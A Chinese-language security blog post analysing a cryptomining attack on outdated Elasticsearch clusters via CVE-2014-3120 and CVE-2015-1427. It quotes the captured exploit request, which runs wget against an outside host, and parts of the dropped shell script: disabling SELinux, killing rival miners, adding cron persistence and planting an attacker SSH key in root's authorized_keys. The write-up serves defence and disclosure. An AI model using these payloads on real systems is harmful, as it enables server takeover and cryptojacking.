在開兩會的前期，保證國家各個方面的穩定的事都提到日程上來，政府部門對互聯網公司的監控也進入了嚴打階段。在這樣的大背景下，公司內部也對包括公共安全信息泄露做了一次大的排查，在此過程中，發現了一些案例，分享給大家。

0x01、入侵手段

對于mongodb、redis等數據庫的攻擊已經講的非常多了，今天給大家分享的是針對不安全的Elasticsearch集群的攻擊。這些攻擊利用CVE-2014-3120和CVE-2015-1427。這兩種攻擊僅存在于舊版本的Elasticsearch中，并利用將腳本傳遞給搜索查詢的能力。把有效攻擊載荷存儲在里面并且執行。

態勢感知-網絡入侵防護系統中，對相關的入侵有檢測功能，策略如下：

1、ETWEB_SERVERPossibleCVE-2014-3120ElasticSearchRemoteCodeExecutionAttempt 2、ETWEB_SERVERPossibleCVE-2015-1427ElasticSearchSandboxEscapeRemoteCodeExecutionAttempt

通過入侵檢測系統，可以獲取到有效的入侵載荷。

"POST/_search?prettyHTTP/1.1 Host:xxx.xx.113.xxx:9200 User-Agent:Go-http-client/1.1\r\nContent-Length:208 Connection:close\r\nAccept-Encoding:gzip { "size":1, "script_fields":{ "lupin":{ "script":"java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime.exec(\"wgethttp://207.148.70.143:8506/IOFoqIgyC0zmf2UR/uuu.sh-P/tmp/sssooo\").getText" } } }"

我們分析一下攻擊載荷都干了什么事。

1、關閉SElinux，干掉現有挖礦進程

#!/bin/sh setenforce0 2>/dev/null echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null ... mv /usr/bin/wget /usr/bin/get mv /usr/bin/curl /usr/bin/url ps auxf|grep -v grep|grep "mine.moneropool.com"|awk "{print $2}"|xargs kill -9 ps auxf|grep -v grep|grep "pool.t00ls.ru"|awk "{print $2}"|xargs kill -9 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk "{print $2}"|xargs kill -9 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk "{print $2}"|xargs kill -9 ps auxf|grep -v grep|grep "zhuabcn@yahoo.com"|awk "{print $2}"|xargs kill -9 ps auxf|grep -v grep|grep "monerohash.com"|awk "{print $2}"|xargs kill -9 ... pkill -f biosetjenkins pkill -f Loopback pkill -f apaceha pkill -f cryptonight pkill -f ir29xc1 pkill -f conns pkill -f irqbalance pkill -f crypto-pool pkill -f minexmr ...

2、在crontab添加定時升級程序，添加自己C2主機的sshkey,下載挖礦配置文件，配置防火墻、刪除日志、開啟反彈shell。

if [ -f "$rtdir" ] then echo "iamroot" echo "goto1" > /etc/devtools chattr -i /etc/devtool* chattr -i /etc/config.json* chattr -i /etc/update.sh* chattr -i /root/.ssh/authorized_keys* chattr -i /etc/systemctI if [ -f "/usr/bin/crontab" ] then [[ $cont =~ "update.sh" ]] || (crontab -l;echo "*/10****sh /etc/update.sh >/dev/null 2<&1")|crontab - else echo "*/10****sh /etc/update.sh >/dev/null 2<&1" >> ${crondir} fi chmod 700 /root/.ssh/ echo /root/.ssh/authorized_keys chmod 600 /root/.ssh/authorized_keys echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDPK+J+AIJvoCX67fFzfbNU5MT816KDmggltbgEI0hKZRdmMMe1ao/3CEgIzeqGbTff1suT/F1POUjGrf5t/ZqyIJzCIBKqNsxzM4tRNxrIGrqKnZypRlXdX+uZNaxmNJZGkkmtdeseekped0WnWk5SsvbYghBn4y9lZnsO+C1EgjLNWkbRPuoo/RkWTIXDmB7M7UcfYf+sSpApACt8DRydSEkeY709WtL0aANnN057Wnp/Okv+buM4mnkuteLtZvCAySt7PVBrCKyhItZx9VX/TMegljt/UPDaKfAeWF14Q1ORLRQkzZt9k+pY/ccNNbS53OmG0NhQ/awchmgXUpsProot@vultr.guest" >> /root/.ssh/authorized_keys

熱點：挖礦